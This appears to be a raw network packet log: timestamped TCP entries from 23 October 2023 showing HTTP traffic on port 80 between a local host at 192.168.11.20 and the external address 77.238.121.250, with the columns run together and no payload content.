                                                                                                                                                                                                        Oct 23, 2023 20:39:41.493037939 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.493316889 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.494599104 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890543938 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890636921 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890691042 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890747070 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890763044 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890801907 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890832901 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890856981 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890919924 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890973091 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.891006947 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.891006947 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.891028881 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.891064882 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.891089916 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.891150951 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.891170025 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.891170025 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.891226053 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.891336918 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.891336918 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.284961939 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285057068 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285115004 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285182953 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285226107 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285226107 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285237074 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285290956 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285291910 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285357952 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285401106 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285414934 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285471916 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285531044 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285535097 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285531044 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285592079 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285634995 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285634995 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285646915 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285722017 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285744905 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285746098 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285779953 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285835028 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285898924 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285904884 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285906076 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.285953045 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.286006927 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.286072016 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.286072969 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.286132097 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.286190987 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.679733992 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.679826975 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.679883957 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.679949045 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.680031061 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.680110931 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.680147886 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681277037 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681363106 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681422949 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681473970 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681482077 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681540966 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681595087 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681627989 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681652069 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681706905 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681710958 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681767941 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681822062 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681828022 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681885958 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681889057 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681940079 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681998968 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.681998968 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682003975 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682060003 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682100058 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682115078 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682164907 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682178020 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682229996 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682235956 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682290077 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682297945 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682349920 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682349920 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682442904 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682451963 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682502031 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682565928 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682617903 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682658911 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682676077 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682723999 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682729959 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682773113 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682782888 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682828903 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682838917 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682876110 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682897091 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682966948 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683013916 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683013916 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683070898 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683115005 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683135986 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683199883 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683218002 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683254004 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683290005 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683442116 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.072293997 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.072380066 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.072438002 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.072572947 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.072572947 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.072572947 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073220968 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073312998 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073369980 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073402882 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073434114 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073462963 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073489904 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073566914 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073677063 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.074238062 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.074335098 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.074445009 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.074501991 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.076277971 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.076358080 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.076416969 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.076474905 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.076534986 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.076534986 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.076596975 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.076714993 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.077541113 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.077794075 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078016043 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078100920 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078159094 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078217030 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078228951 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078275919 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078288078 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078330040 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078377962 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078387022 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078425884 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078452110 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078479052 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078510046 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078572035 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078627110 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078679085 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078733921 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078741074 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078795910 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078845978 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078851938 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078912973 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079051971 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079056978 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079114914 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079166889 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079169035 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079224110 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079286098 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079340935 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079392910 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079482079 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079540968 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079557896 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079607010 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079659939 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079687119 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079713106 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079751015 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079775095 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079794884 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079829931 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079885960 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079931021 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079941988 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080001116 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080068111 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080147982 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080154896 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080216885 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080279112 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080297947 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080332041 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080385923 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080389977 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080436945 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080446959 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080493927 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080493927 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080502987 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080555916 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080596924 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080621004 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080647945 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080676079 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080739975 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080797911 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080820084 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080854893 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080908060 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080951929 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080969095 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.080996990 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081023932 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081069946 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081078053 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081140041 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081182003 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081193924 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081231117 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081248999 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081299067 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081312895 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081347942 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081367016 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081420898 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081429005 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081478119 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081481934 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081532001 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081536055 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081581116 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081593037 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081635952 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081655979 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081685066 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081711054 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081765890 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081815004 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.081897974 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.466231108 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.466325998 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.466382980 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.466444016 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.466497898 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.466552019 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.466620922 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.466923952 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.466981888 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467104912 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467185974 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467261076 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467353106 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467412949 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467457056 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467479944 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467536926 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467542887 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467591047 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467596054 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467653990 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467766047 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467767000 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467878103 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467888117 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467935085 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.467998028 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.468054056 CEST5003680192.168.11.2077.238.121.250
